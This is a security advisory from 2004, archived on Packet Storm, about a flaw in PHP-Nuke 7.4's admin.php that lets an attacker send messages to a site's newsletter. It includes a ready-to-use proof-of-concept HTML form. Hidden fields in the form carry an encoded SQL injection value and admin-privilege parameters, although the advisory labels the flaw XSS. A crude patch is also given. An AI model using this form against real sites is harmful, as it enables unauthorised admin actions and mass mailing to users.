exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

CODEBUG Labs Security Advisory 5

CODEBUG Labs Security Advisory 5
Posted Sep 9, 2004
Authored by Pierquinto Manco, CODEBUG Labs | Site mantralab.org

PHP-Nuke 7.4 has a cross site scripting flaw that allows an attacker the ability to post messages in a system newsletter.

tags | advisory, php, xss
SHA-256 | 70838e1167350de5c53df0b19021ae1a35f30f117a6a21475b296353ab6f21fa

CODEBUG Labs Security Advisory 5

Change Mirror Download


**************************************************************
* CODEBUG Labs
* Advisory #5
* Title: Newsletter Injection Bug
* Author: Pierquinto 'Mantra' Manco
* Product: PHP-Nuke 7.4
* Type: XSS
* Web: http://www.mantralab.org
*
**************************************************************

Newsletter Injection Bug

- ) Description
PHP-Nuke is a very bugged web CMS, version 7.4 has critical
XSS bug that permit to an attacker to post message in system newsletter.
We can bypass the official php-nuke patch sending data
by POST instead of GET.

- ) Proof-of-Concept
Create a HTML file with this lines:

<form name="mantra" method="POST" action="http://www.sitewithphpnuke.com/admin.php">
<p>TITLE:
<input type="text" name="title">
<br>
CONTENT:
<textarea name="content" rows=10 cols=50></textarea>
<br>
<input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox">
<br>
<input type="hidden" name="add_radminsuper" value="1">
<br>
<input type="hidden" name="op" value="massmail_send">
</p>
<p>
<input type="submit" name="Submit" value="Send to target site newsletter">
<br>
</p>
</form>

- ) Patch

Apply this code to your admin.php file:

if ( !empty($HTTP_GET_VARS['admin']) ) {
die("Shit! Mantra wins =)");
}

if ( !empty($HTTP_POST_VARS['admin']) ) {
die("Shit! Mantra wins =)");
}

-) Note
Previous patch isn't enough performant.
Try this one.
There are a lot of this problem in PHP-Nuke 7.4, my patch will check
the content of $_POST[admin] and $_GET[admin].
I'm going to post all this vulnerabilities on my site...
http://www.mantralab.org

**************************************************************
http://www.mantralab.org
**************************************************************
Login or Register to add favorites

File Archive:

February 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    16 Files
  • 2
    Feb 2nd
    19 Files
  • 3
    Feb 3rd
    0 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    2 Files
  • 7
    Feb 7th
    10 Files
  • 8
    Feb 8th
    25 Files
  • 9
    Feb 9th
    37 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    17 Files
  • 13
    Feb 13th
    20 Files
  • 14
    Feb 14th
    25 Files
  • 15
    Feb 15th
    15 Files
  • 16
    Feb 16th
    6 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    35 Files
  • 20
    Feb 20th
    25 Files
  • 21
    Feb 21st
    18 Files
  • 22
    Feb 22nd
    15 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    10 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files
  • 29
    Feb 29th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close